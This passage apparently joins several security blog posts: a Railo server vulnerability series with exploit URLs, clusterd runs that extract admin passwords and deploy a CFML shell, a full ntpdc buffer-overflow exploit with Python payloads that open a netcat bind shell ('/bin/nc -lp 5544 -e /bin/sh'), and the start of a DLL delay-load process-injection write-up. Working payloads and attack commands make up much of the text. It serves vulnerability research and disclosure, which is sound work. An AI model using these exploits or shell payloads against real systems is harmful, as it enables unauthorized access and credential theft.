I mentioned briefly at the start of this post that there were “several” post-authentication RCE vulnerabilities. Yes. Several. The one documented above was fun to find and figure out, but there is another way that’s much cleaner. Railo has a function that allows administrators to set logging information, such as level and type and location. It also allows you to create your own logging handlers:
Here we’re building an HTML layout log file that will append all ERROR logs to the file. And we notice we can configure the path and the title. And the log extension. Easy win. By modifying the path to /context/my_file.cfm and setting the title to <cfdump var="#session#"> we can execute arbitrary commands on the file system and obtain shell access. The file is not created once you create the log, but once you select Edit and then Submit for some reason. Here’s the HTML output that’s, by default, stuck into the file:
Note our title contains the injected command. Here’s execution:
Using this method we can, again, inject a shell without requiring the use of any reverse connections, though that option is of course available with the help of the cfhttp tag.
Another fun post-authentication feature is the use of data sources. In Railo, you can craft a custom data source, which is a user-defined database abstraction that can be used as a filesystem. Here’s the definition of a MySQL data source:
With this defined, we can set all client session data to be stored in the database, allowing us to harvest session ID’s and plaintext credentials (see part one). Once the session storage is set to the created database, a new table will be created (cf_session_data) that will contain all relevant session information, including symmetrically-encrypted passwords.
Part three and four of this series will begin to dive into the good stuff, where we’ll discuss several pre-authentication vulnerabilities that we can use to obtain credentials and remote code execution on a Railo host.
This post continues our four part Railo security analysis with three pre-authentication LFI vulnerabilities. These allow anonymous users access to retrieve the administrative plaintext password and login to the server’s administrative interfaces. If you’re unfamiliar with Railo, I recommend at the very least reading part one of this series. The most significant LFI discussed has been implemented as auxiliary modules in clusterd, though they’re pretty trivial to exploit on their own.
We’ll kick this portion off by introducing a pre-authentication LFI vulnerability that affects all versions of Railo Express; if you’re unfamiliar with the Express install, it’s really just a self-contained, no-installation-necessary package that harnesses Jetty to host the service. The flaw actually has nothing to do with Railo itself, but rather in this packaged web server, Jetty. CVE-2007-6672 addresses this issue, but it appears that the Railo folks have not bothered to update this. Via the browser, we can pull the config file, complete with the admin hash, with http://[host]:8888/railo-context/admin/..\..\railo-web.xml.cfm.
A quick run of this in clusterd on Railo 4.0:
123456789101112131415161718192021
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.0 --rl-pw
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-15 06:25PM] Started at 2014-05-15 06:25PM
[2014-05-15 06:25PM] Servers' OS hinted at windows
[2014-05-15 06:25PM] Fingerprinting host '192.168.1.219'
[2014-05-15 06:25PM] Server hinted at 'railo'
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Server...
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Server Administrator...
[2014-05-15 06:25PM] Checking railo version 4.0 Railo Web Administrator...
[2014-05-15 06:25PM] Matched 3 fingerprints for service railo
[2014-05-15 06:25PM] Railo Server (version 4.0)
[2014-05-15 06:25PM] Railo Server Administrator (version 4.0)
[2014-05-15 06:25PM] Railo Web Administrator (version 4.0)
[2014-05-15 06:25PM] Fingerprinting completed.
[2014-05-15 06:25PM] Attempting to pull password...
[2014-05-15 06:25PM] Fetched encrypted password, decrypting...
[2014-05-15 06:25PM] Decrypted password: default
[2014-05-15 06:25PM] Finished at 2014-05-15 06:25PM
and on the latest release of Railo, 4.2:
1234567891011121314151617181920
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.2 --rl-pw
clusterd/0.3 - clustered attack toolkit
[Supporting 6 platforms]
[2014-05-15 06:28PM] Started at 2014-05-15 06:28PM
[2014-05-15 06:28PM] Servers' OS hinted at windows
[2014-05-15 06:28PM] Fingerprinting host '192.168.1.219'
[2014-05-15 06:28PM] Server hinted at 'railo'
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Server...
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Server Administrator...
[2014-05-15 06:28PM] Checking railo version 4.2 Railo Web Administrator...
[2014-05-15 06:28PM] Matched 3 fingerprints for service railo
[2014-05-15 06:28PM] Railo Server (version 4.2)
[2014-05-15 06:28PM] Railo Server Administrator (version 4.2)
[2014-05-15 06:28PM] Railo Web Administrator (version 4.2)
[2014-05-15 06:28PM] Fingerprinting completed.
[2014-05-15 06:28PM] Attempting to pull password...
[2014-05-15 06:28PM] Fetched password hash: d34535cb71909c4821babec3396474d35a978948455a3284fd4e1bc9c547f58b
[2014-05-15 06:28PM] Finished at 2014-05-15 06:28PM
Using this LFI, we can pull the railo-web.xml.cfm file, which contains the administrative password. Notice that 4.2 only dumps a hash, whilst 4.0 dumps a plaintext password. This is because versions <= 4.0 blowfish encrypt the password, and > 4.0 actually hashes it. Here’s the relevant code from Railo (ConfigWebFactory.java):
123456789101112131415161718
private static void loadRailoConfig(ConfigServerImpl configServer, ConfigImpl config, Document doc) throws IOException {
Element railoConfiguration = doc.getDocumentElement();
// password
String hpw=railoConfiguration.getAttribute("pw");
if(StringUtil.isEmpty(hpw)) {
// old password type
String pwEnc = railoConfiguration.getAttribute("password"); // encrypted password (reversable)
if (!StringUtil.isEmpty(pwEnc)) {
String pwDec = new BlowfishEasy("tpwisgh").decryptString(pwEnc);
hpw=hash(pwDec);
}
}
if(!StringUtil.isEmpty(hpw))
config.setPassword(hpw);
else if (configServer != null) {
config.setPassword(configServer.getDefaultPassword());
}
As above, they actually encrypted the password using a hard-coded symmetric key; this is where versions <= 4.0 stop. In > 4.0, after decryption they hash the password (SHA256) and use it as such. Note that the encryption/decryption is no longer the actual password in > 4.0, so we cannot simply decrypt the value to use and abuse.
Due to the configuration of the web server, we can only pull CFM files; this is fine for the configuration file, but system files prove troublesome…
The second LFI is a trivial XXE that affects versions <= 4.0, and is exploitable out-of-the-box with Metasploit. Unlike the Jetty LFI, this affects all versions of Railo, both installed and express:
Using this we cannot pull railo-web.xml.cfm due to it containing XML headers, and we cannot use the standard OOB methods for retrieving files. Timothy Morgan gave a great talk at OWASP Appsec 2013 that detailed a neat way of abusing Java XML parsers to obtain RCE via XXE. The process is pretty interesting; if you submit a URL with a jar:// protocol handler, the server will download the zip/jar to a temporary location, perform some header parsing, and then delete it. However, if you push the file and leave the connection open, the file will persist. This vector, combined with one of the other LFI’s, could be a reliable pre-authentication RCE, but I was unable to get it working.
The third LFI is just as trivial as the first two, and again stems from the pandemic problem of failing to authenticate at the URL/page level. img.cfm is a file used to, you guessed it, pull images from the system for display. Unfortunately, it fails to sanitize anything:
By fetching this page with attributes.src set to another CFM file off elsewhere, we can load the file and execute any tags contained therein. As we’ve done above, lets grab railo-web.xml.cfm; we can do this with the following url: http://host:8888/railo-context/admin/img.cfm?attributes.src=../../../../railo-web.xml&thistag.executionmode=start which simply returns
This vulnerability exists in 3.3 – 4.2.1 (latest), and is exploitable out-of-the-box on both Railo installed and Express editions. Though you can only pull CFM files, the configuration file dumps plenty of juicy information. It may also be beneficial for custom tags, plugins, and custom applications that may house other vulnerable/sensitive information hidden away from the URL.
Curiously, at first glance it looks like it may be possible to turn this LFI into an RFI. Unfortunately it’s not quite that simple; if we attempt to access a non-existent file, we see the following:
1
The error occurred in zip://C:\Documents and Settings\bryan\My Documents\Downloads\railo\railo-express-4.2.1.000-jre-win32\webapps\ROOT\WEB-INF\railo\context\railo-context.ra!/admin/img.cfm: line 29
Notice the zip:// handler. This prevents us from injecting a path to a remote host with any other handler. If, however, the tag looked like this:
1
<cfinclude>#attributes.src#</cfinclude>
Then it would have been trivially exploitable via RFI. As it stands, it’s not possible to modify the handler without prior code execution.
To sum up the LFI’s: all versions and all installs are vulnerable via the img.cfm vector. All versions and all express editions are vulnerable via the Jetty LFI. Versions <= 4.0 and all installs are vulnerable to the XXE vector. This gives us reliable LFI in all current versions of Railo.
This concludes our pre-authentication LFI portion of this assessment, which will crescendo with our final post detailing several pre-authentication RCE vulnerabilities. I expect a quick turnaround for part four, and hope to have it out in a few days. Stay tuned!
This post concludes our deep dive into the Railo application server by detailing not only one, but two pre-auth remote code execution vulnerabilities. If you’ve skipped the first three parts of this blog post to get to the juicy stuff, I don’t blame you, but I do recommend going back and reading them; there’s some important information and details back there. In this post, we’ll be documenting both vulnerabilities from start to finish, along with some demonstrations and notes on clusterd’s implementation on one of these.
The first RCE vulnerability affects versions 4.1 and 4.2.x of Railo, 4.2.1 being the latest release. Our vulnerability begins with the file thumbnail.cfm, which Railo uses to store admin thumbnails as static content on the server. As previously noted, Railo relies on authentication measures via the cfadmin tag, and thus none of the cfm files actually contain authentication routines themselves.
thumbnail.cfm first generates a hash of the image along with it’s width and height:
The cffile tag is used to read the raw image and then cast it via the cfimage tag. The wonderful thing about cffile is that we can provide URLs that it will arbitrarily retrieve. So, our URL can be this:
And Railo will go and fetch the image and cast it. Note that if a height and width are not provided it will attempt to resize it; we don’t want this, and thus we provide large width and height values. This file is written out to /railo/temp/admin-ext-thumbnails/[HASH].[EXTENSION].
We’ve now successfully written a file onto the remote system, and need a way to retrieve it. The temp folder is not accessible from the web root, so we need some sort of LFI to fetch it. Enter jsloader.cfc.
jsloader.cfc is a Railo component used to fetch and load Javascript files. In this file is a CF tag called get, which accepts a single argument lib, which the tag will read and return. We can use this to fetch arbitrary Javascript files on the system and load them onto the page. Note that it MUST be a Javascript file, as the extension is hard-coded into the file and null bytes don’t work here, like they would in PHP. Here’s the relevant code:
12345678
<cfset var filePath = expandPath('js/#arguments.lib#.js')/>
<cfset var local = {result=""} /><cfcontent type="text/javascript">
<cfsavecontent variable="local.result">
<cfif fileExists(filePath)>
<cfinclude template="js/#arguments.lib#.js"/>
</cfif>
</cfsavecontent>
<cfreturn local.result />
Let’s tie all this together. Using thumbnail.cfm, we can write well-formed images to the file system, and using the jsloader.cfc file, we can read arbitrary Javascript. Recall how log injection works with PHP; we can inject PHP tags into arbitrary files so long as the file is loaded by PHP, and parsed accordingly. We can fill a file full of junk, but if the parser has its way a single <?phpinfo();?> will be discovered and executed; the CFML engine works the same way.
Our attack becomes much more clear: we generate a well-formed PNG file, embed CFML code into the image (metadata), set the extension to .js, and write it via thumbnail.cfm. We then retrieve the file via jsloader.cfc and, because we’re loading it with a CFM file, it will be parsed and executed. Let’s check this out:
1234567891011121314151617181920212223
$ ./clusterd.py -i 192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer jsload
clusterd/0.3.1 - clustered attack toolkit
[Supporting 6 platforms]
[2014-06-15 03:39PM] Started at 2014-06-15 03:39PM
[2014-06-15 03:39PM] Servers' OS hinted at windows
[2014-06-15 03:39PM] Fingerprinting host '192.168.1.219'
[2014-06-15 03:39PM] Server hinted at 'railo'
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Server...
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Server Administrator...
[2014-06-15 03:39PM] Checking railo version 4.1 Railo Web Administrator...
[2014-06-15 03:39PM] Matched 2 fingerprints for service railo
[2014-06-15 03:39PM] Railo Server Administrator (version 4.1)
[2014-06-15 03:39PM] Railo Web Administrator (version 4.1)
[2014-06-15 03:39PM] Fingerprinting completed.
[2014-06-15 03:39PM] This deployer (jsload_lfi) requires an external listening port (8000). Continue? [Y/n] >
[2014-06-15 03:39PM] Preparing to deploy cmd.cfml...
[2014-06-15 03:40PM] Waiting for remote server to download file [5s]]
[2014-06-15 03:40PM] Invoking stager and deploying payload...
[2014-06-15 03:40PM] Waiting for remote server to download file [7s]]
[2014-06-15 03:40PM] cmd.cfml deployed at /railo-context/cmd.cfml
[2014-06-15 03:40PM] Finished at 2014-06-15 03:40PM
A couple things to note; as you may notice, the module currently requires the Railo server to connect back twice. Once is for the image with embedded CFML, and the second for the payload. We embed only a stager in the image that then connects back for the actual payload.
Sadly, the LFI was unknowingly killed in 4.2.1 with the following fix to jsloader.cfc:
The arguments.lib variable contains our controllable path, but it kills our ability to traverse out. Unfortunately, we can’t substitute the .. with unicode or utf-16 due to the way Jetty and Java are configured, by default. This file is pretty much useless to us now, unless we can write into the folder that jsloader.cfc reads from; then we don’t need to traverse out at all.
We can still pop this on Express installs, due to the Jetty LFI discussed in part 3. By simply traversing into the extensions folder, we can load up the Javascript file and execute our shell. Railo installs still prove elusive.
buuuuuuuuuuuuuuuuuuuuuuuuut
Recall the img.cfm LFI from part 3; by tip-toeing back into the admin-ext-thumbnails folder, we can summon our vulnerable image and execute whatever coldfusion we shove into it. This proves to be an even better choice than jsloader.cfc, as we don’t need to traverse as far. This bug only affects versions 4.1 – 4.2.1, as thumbnail.cfm wasn’t added until 4.1. CVE-2014-5468 has been assigned to this issue.
The second RCE vulnerability is a bit easier and has a larger attack vector, spanning all versions of Railo. As previously noted, Railo does not do per page/URL authentication, but rather enforces it when making changes via the <cfadmin> tag. Due to this, any pages doing naughty things without checking with the tag may be exploitable, as previously seen. Another such file is overview.uploadNewLangFile.cfm:
The tricky bit is where it’s written to; Railo uses a compression system that dynamically generates compressed versions of the web server, contained within railo-context.ra. A mirror of these can be found under the following:
1
[ROOT]\webapps\ROOT\WEB-INF\railo\temp\compress
The compressed data is then obfuscated behind two more folders, both MD5s. In my example, it becomes:
So we cannot simply traverse into this path, as the hashes change every single time a file is added, removed, or modified. I’ll walk the logic used to generate these, but as a precusor, we aren’t going to figure these out without some other fashionable info disclosure bug.
The hashes are calculated in railo-java/railo-core/src/railo/commons/io/res/type/compress/Compress.java:
The first hash is then cid + "-" + ffile.getAbsolutePath(), where cid is the randomly generated ID found in the id file (see part two) and ffile.getAbsolutePath() is the full path to the classes resource. This is doable if we have the XXE, but 4.1+ is inaccessible.
The second hash is actLastMode + ":" + ffile.length(), where actLastMode is the last modified time of the file and ffile.length() is the obvious file length. Again, this is likely not brute forcable without a serious infoleak vulnerability. Hosts <= 4.0 are exploitable, as we can list files with the XXE via the following:
[email protected]:~/tools/clusterd$ python http_test_xxe.py
88d817d1b3c2c6d65e50308ef88e579c
[SNIP - in which we modify the path to include ^]
[email protected]:~/tools/clusterd$ python http_test_xxe.py
0bdbf4d66d61a71378f032ce338258f2
[SNIP - in which we modify the path to include ^]
[email protected]:~/tools/clusterd$ python http_test_xxe.py
admin
admin_cfc$cf.class
admin_cfm$cf.class
application_cfc$cf.class
application_cfm$cf.class
component_cfc$cf.class
component_dump_cfm450$cf.class
doc
doc_cfm$cf.class
form_cfm$cf.class
gateway
graph_cfm$cf.class
jquery_blockui_js_cfm1012$cf.class
jquery_js_cfm322$cf.class
META-INF
railo_applet_cfm270$cf.class
res
templates
wddx_cfm$cf.class
http_test_xxe.py is just a small hack I wrote to exploit the XXE, in which we eventually obtain both valid hashes. So we can exploit this in versions <= 4.0 Express. Later versions, as far as I can find, have no discernible way of obtaining full RCE without another infoleak or resorting to a slow, loud, painful death of brute forcing two MD5 hashes.
The first RCE is currently available in clusterd dev, and a PR is being made to Metasploit thanks to @BrandonPrry. Hopefully it can be merged shortly.
As we conclude our Railo analysis, lets quickly recap the vulnerabilities discovered during this audit:
12345678910111213141516171819202122
Version 4.2:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express) (Up to version 4.2.0)
Version 4.1:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
Version 4.0:
- Pre-authentication LFI via XXE (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Install/Express)
- Pre-authentication RCE via `jsloader.cfc` and `thumbnail.cfm` (Install/Express)
- Pre-authentication RCE via `img.cfm` and `thumbnail.cfm` (Install/Express)
Version 3.x:
- Pre-authentication LFI via `img.cfm` (Install/Express)
- Pre-authentication LFI via Jetty CVE (Express)
- Pre-authentication LFI via XXE (Install/Express)
- Pre-authentication RCE via XXE and `overview.uploadNewLangFile` (Express)
This does not include the random XSS bugs or post-authentication issues. At the end of it all, this appears to be a framework with great ideas, but desperately in need of code TLC. Driving forward with a checklist of features may look nice on a README page, but the desolate wasteland of code left behind can be a scary thing. Hopefully the Railo guys take note and spend some serious time evaluating and improving existing code. The bugs found during this series have been disclosed to the developers; here’s to hoping they follow through.
Alejandro Hdez (@nitr0usmx) recently tweeted about a trivial buffer overflow in ntpdc, a deprecated NTP query tool still available and packaged with any NTP install. He posted a screenshot of the crash as the result of a large buffer passed into a vulnerable gets call. After digging into it a bit, I decided it’d be a fun exploit to write, and it was. There are a few quarks to it that make it of particular interest, of which I’ve detailed below.
As noted, the bug is the result of a vulnerable gets, which can be crashed with the following:
And the result of Debian’s recommended hardening-check:
1234567
$ hardening-check /usr/bin/ntpdc
/usr/bin/ntpdc:
Position Independent Executable: no, normal executable!
Stack protected: yes
Fortify Source functions: yes (some protected functions found)
Read-only relocations: yes
Immediate binding: no, not found!
Interestingly enough, I discovered this oddity after I had gained code execution in a place I shouldn’t have. We’re also running with ASLR enabled:
12
$ cat /proc/sys/kernel/randomize_va_space
2
I’ll explain why the above is interesting in a moment.
So in our current state, we control three registers and an instruction dereferencing ESI+0x14. If we take a look just a few instructions ahead, we see the following:
12345678
gdb-peda$ x/8i $eip
=> 0xb7fa1d76 <el_gets+22>: mov eax,DWORD PTR [esi+0x14] ; deref ESI+0x14 and move into EAX
0xb7fa1d79 <el_gets+25>: test al,0x2 ; test lower byte against 0x2
0xb7fa1d7b <el_gets+27>: je 0xb7fa1df8 <el_gets+152> ; jump if ZF == 1
0xb7fa1d7d <el_gets+29>: mov ebp,DWORD PTR [esi+0x2c] ; doesnt matter
0xb7fa1d80 <el_gets+32>: mov DWORD PTR [esp+0x4],ebp ; doesnt matter
0xb7fa1d84 <el_gets+36>: mov DWORD PTR [esp],esi ; doesnt matter
0xb7fa1d87 <el_gets+39>: call DWORD PTR [esi+0x318] ; call a controllable pointer
I’ve detailed the instructions above, but essentially we’ve got a free CALL. In order to reach this, we need an ESI value that at +0x14 will set ZF == 0 (to bypass the test/je) and at +0x318 will point into controlled data.
Naturally, we should figure out where our payload junk is and go from there.
12345678910111213
gdb-peda$ searchmem 0x41414141
Searching for '0x41414141' in: None ranges
Found 751 results, display max 256 items:
ntpdc : 0x806ab00 ('A' <repeats 200 times>...)
gdb-peda$ maintenance i sections
[snip]
0x806a400->0x806edc8 at 0x00021400: .bss ALLOC
gdb-peda$ vmmap
Start End Perm Name
0x08048000 0x08068000 r-xp /usr/bin/ntpdc
0x08068000 0x08069000 r--p /usr/bin/ntpdc
0x08069000 0x0806b000 rw-p /usr/bin/ntpdc
[snip]
Our payload is copied into BSS, which is beneficial as this will remain unaffected by ASLR, further bonus points because our binary wasn’t compiled with PIE. We now need to move back -0x318 and look for a value that will set ZF == 0 with the test al,0x2 instruction. A value at 0x806a9e1 satisfies both the +0x14 and +0x318 requirements:
Now that we’ve got EIP, it’s a simple matter of stack pivoting to execute a ROP payload. Let’s figure out where that "C"*600 lands in memory and redirect EIP there:
Er, what? It appears to be executing code in BSS! Recall the output of paxtest/checksec/hardening-check from earlier, NX was clearly enabled. This took me a few hours to figure out, but it ultimately came down to Debian not distributing x86 images with PAE, or Physical Address Extension. PAE is a kernel feature that allows 32-bit CPU’s to access physical page tables and doubling each entry in the page table and page directory. This third level of paging and increased entry size is required for NX on x86 architectures because NX adds a single ‘dont execute’ bit to the page table. You can read more about PAE here, and the original NX patch here.
This flag can be tested for with a simple grep of /proc/cpuinfo; on a fresh install of Debian 7, a grep for PAE will turn up empty, but on something with support, such as Ubuntu, you’ll get the flag back.
Because I had come this far already, I figured I might as well get the exploit working. At this point it was simple, anyway:
12345678910111213
$ python -c 'print "A"*485 + "\x3c\xad\x06\x08" + "A"*79 + "\xcd\xa9\x06\x08" + "\x90"*4 + "\x68\xec\xf7\xff\xbf\x68\x70\xe2\xc8\xb7\x68\x30\xac\xc9\xb7\xc3"' > input2.file
$ gdb -q /usr/bin/ntpdc
Reading symbols from /usr/bin/ntpdc...(no debugging symbols found)...done.
gdb-peda$ r < input.file
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
***Command `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA<�AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAͩ����h����hp�ȷh0�ɷ�' unknown
[New process 4396]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
process 4396 is executing new program: /bin/dash
[New process 4397]
process 4397 is executing new program: /bin/nc.traditional
This uses a simple system payload with hard-coded addresses, because at this point it’s an old-school, CTF-style exploit. And it works. With this trivial PoC working, I decided to check another box I had to verify this is a common distribution method. An Ubuntu VM said otherwise:
1234567
$ uname -a
Linux bryan-VirtualBox 3.2.0-74-generic #109-Ubuntu SMP Tue Dec 9 16:47:54 UTC 2014 i686 i686 i386 GNU/Linux
$ ./checksec.sh --file /usr/bin/ntpdc
RELRO STACK CANARY NX PIE RPATH RUNPATH FILE
Full RELRO Canary found NX enabled PIE enabled No RPATH No RUNPATH /usr/bin/ntpdc
$ cat /proc/sys/kernel/randomize_va_space
2
Quite a different story. We need to bypass full RELRO (no GOT overwrites), PIE+ASLR, NX, SSP, and ASCII armor. In our current state, things are looking pretty grim. As an aside, it’s important to remember that because this is a local exploit, the attacker is assumed to have limited control over the system. Ergo, an attacker may inspect and modify the system in the same manner a limited user could. This becomes important with a few techniques we’re going to use moving forward.
Our first priority is stack pivoting; we won’t be able to ROP to victory without control over the stack. There are a few options for this, but the easiest option is likely going to be an ADD ESP, ? gadget. The problem with this being that we need to have some sort of control over the stack or be able to modify ESP somewhere into BSS that we control. Looking at the output of ropgadget, we’ve got 36 options, almost all of which are of the form ADD ESP, ?.
After looking through the list, I determined that none of the values led to control over the stack; in fact, nothing I injected landed on the stack. I did note, however, the following:
123456789101112
gdb-peda$ x/6i 0x800143e0
0x800143e0: add esp,0x256c
0x800143e6: pop ebx
0x800143e7: pop esi
0x800143e8: pop edi
0x800143e9: pop ebp
0x800143ea: ret
gdb-peda$ x/30s $esp+0x256c
0xbffff3a4: "-1420310755.557158-104120677"
0xbffff3c1: "WINDOWID=69206020"
0xbffff3d3: "GNOME_KEYRING_CONTROL=/tmp/keyring-iBX3uM"
0xbffff3fd: "GTK_MODULES=canberra-gtk-module:canberra-gtk-module"
These are environmental variables passed into the application and located on the program stack. Using the ROP gadget ADD ESP, 0x256c, followed by a series of register POPs, we could land here. Controlling this is easy with the help of LD_PRELOAD, a neat trick documented by Dan Rosenberg in 2010. By exporting LD_PRELOAD, we can control uninitialized data located on the stack, as follows:
This gives us EIP, control over the stack, and control over a decent number of registers; however, the LD_PRELOAD trick is extremely sensitive to stack shifting which represents a pretty big problem for exploit portability. For now, I’m going to forget about it; chances are we could brute force the offset, if necessary, or simply invoke the application with env -i.
From here, we need to figure out a ROP payload. The easiest payload I can think of is a simple ret2libc. Unfortunately, ASCII armor null bytes all of them:
12345678
gdb-peda$ vmmap
0x00327000 0x004cb000 r-xp /lib/i386-linux-gnu/libc-2.15.so
0x004cb000 0x004cd000 r--p /lib/i386-linux-gnu/libc-2.15.so
0x004cd000 0x004ce000 rw-p /lib/i386-linux-gnu/libc-2.15.so
gdb-peda$ p system
$1 = {<text variable, no debug info>} 0x366060 <system>
gdb-peda$
One idea I had was to simply construct the address in memory, then call it. Using ROPgadget, I hunted for ADD/SUB instructions that modified any registers we controlled. Eventually, I discovered this gem:
12
0x800138f2: add edi, esi; ret 0;
0x80022073: call edi
Using the above, we could pop controlled, non-null values into EDI/ESI, that when added equaled 0x366060 <system>. Many values will work, but I chose 0xeeffffff + 0x11366061:
As shown above, we’ve got our two values in EDI/ESI and are returning to our ADD EDI, ESI gadget. Once this completes, we return to our CALL EDI gadget, which will jump into system:
1234567
EDI: 0x366060 (<system>: sub esp,0x1c)
EBP: 0x41414141 ('AAAA')
ESP: 0xbfffefc0 --> 0xbffff60d ("/bin/nc -lp 5544 -e /bin/sh")
EIP: 0x80022073 --> 0xd7ff
EFLAGS: 0x217 (CARRY PARITY ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
=> 0x80022073: call edi
Recall the format of a ret2libc: [system() address | exit() | shell command]; therefore, we need to stick a bogus exit address (in my case, junk) as well as the address of a command. Also remember, however, that CALL EDI is essentially a macro for PUSH EIP+2 ; JMP EDI. This means that our stack will be tainted with the address @ EIP+2. Thanks to this, we don’t really need to add an exit address, as one will be added for us. There are, unfortunately, no JMP EDI gadgets in the binary, so we’re stuck with a messy exit.
This culminates in:
12345678910
$ export LD_PRELOAD=`python -c 'print "A"*8472 + "\xff\xff\xff\xee" + "\x61\x60\x36\x11" + "AAAA" + "\xf2\x38\x01\x80" + "\x73\x20\x02\x80" + "\x0d\xf6\xff\xbf" + "C"*1492'`
$ gdb -q /usr/bin/ntpdc
gdb-peda$ r < input.file
[snip all the LD_PRELOAD crap]
[New process 31184]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
process 31184 is executing new program: /bin/dash
[New process 31185]
process 31185 is executing new program: /bin/nc.traditional
Success! Though this is a very dirty hack, and makes no claim of portability, it works. As noted previously, we can brute force the image base and stack offsets, though we can also execute the binary with an empty environment and no stack tampering with env -i, giving us a much higher chance of hitting our mark.
Overall, this was quite a bit of fun. Although ASLR/PIE still poses an issue, this is a local bug that brute forcing and a little investigation can’t take care of. NX/RELRO/Canary/SSP/ASCII Armor have all been successfully neutralized. I hacked up a PoC that should work on Ubuntu boxes as configured, but it brute forces offsets. Test runs show it can take up to 2 hours to successfully pop a box. Full code can be found below.
This is just a placeholder post to link off to Stephen Breen and I’s paper on
abusing token privileges. You can read the entire paper here[0]. I also
recommend checking out the blogpost he posted on Foxglove here[1].
I always tell myself that I’ll try posting more frequently on my blog, and yet
here I am, two years later. Perhaps this post will provide the necessary
motiviation to conduct more public research. I do love it.
This post details a novel remote code injection technique I discovered while
playing around with delay loading DLLs. It allows for the injection of
arbitrary code into arbitrary remote, running processes, provided that they
implement the abused functionality. To make it abundantly clear, this is not
an exploit, it’s simply another strategy for migrating into other processes.
Modern code injection techniques typically rely on a variation of two different
win32 API calls: CreateRemoteThread and NtQueueApc. Endgame recently put out a
great article[0] detailing ten various methods of process injection. While not
all of them allow for injection into remote processes, particularly those
already running, it does detail the most common, public variations. This
strategy is more akin to inline hooking, though we’re not touching the IAT
and we don’t require our code to already be in the process. There are no calls
to NtQueueApc or CreateRemoteThread, and no need for thread or process
suspension. There are some limitations, as with anything, which I’ll detail
below.
Delay Load DLL
Delay loading is a linker strategy that allows for the lazy loading of DLLs.
Executables commonly load all necessary dynamically linked libraries at runtime
and perform the IAT fix-ups then. Delay loading, however, allows for
these libraries to be lazy loaded at call time, supported by a pseudo IAT
that’s fixed-up on first call. This process can be better illuminated by the
following, decades old figure below:
This image comes from a great Microsoft article released in 1998 [1] that
describes the strategy quite well, but I’ll attempt to distill it here.
Portable executables contain a data directory named
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT, which you can see using dumpbin /imports
or using windbg. The structure of this entry is described in delayhlp.cpp,
included with the WinSDK:
1234567891011
struct InternalImgDelayDescr {
DWORD grAttrs; // attributes
LPCSTR szName; // pointer to dll name
HMODULE * phmod; // address of module handle
PImgThunkData pIAT; // address of the IAT
PCImgThunkData pINT; // address of the INT
PCImgThunkData pBoundIAT; // address of the optional bound IAT
PCImgThunkData pUnloadIAT; // address of optional copy of original IAT
DWORD dwTimeStamp; // 0 if not bound,
// O.W. date/time stamp of DLL bound to (Old BIND)
};
The table itself contains RVAs, not pointers. We can find the delay directory
offset by parsing the file header:
12345678910111213141516
0:022> lm m explorer
start end module name
00690000 00969000 explorer (pdb symbols)
0:022> !dh 00690000 -f
File Type: EXECUTABLE IMAGE
FILE HEADER VALUES
[...]
68A80 [ 40] address [size] of Load Configuration Directory
0 [ 0] address [size] of Bound Import Directory
1000 [ D98] address [size] of Import Address Table Directory
AC670 [ 140] address [size] of Delay Import Directory
0 [ 0] address [size] of COR20 Header Directory
0 [ 0] address [size] of Reserved Directory
The first entry and it’s delay linked DLL can be seen in the following:
This means that WINMM is dynamically linked to explorer.exe, but delay loaded,
and will not be loaded into the process until the imported function is invoked.
Once loaded, a helper function fixes up the psuedo IAT by using GetProcAddress
to locate the desired function and patching the table at runtime.
The pseudo IAT referenced is separate from the standard PE IAT; this IAT
is specifically for the delay load functions, and is referenced from the delay
descriptor. So for example, in WINMM.dll’s case, the pseudo IAT for WINMM is
at RVA 000b1000. The second delay descriptor entry would have a separate RVA
for its pseudo IAT, and so on and so forth.
Using WINMM as our delay example, explorer imports one function from it, PlaySoundW.
In my particular running instance, it has not been invoked, so the pseudo IAT
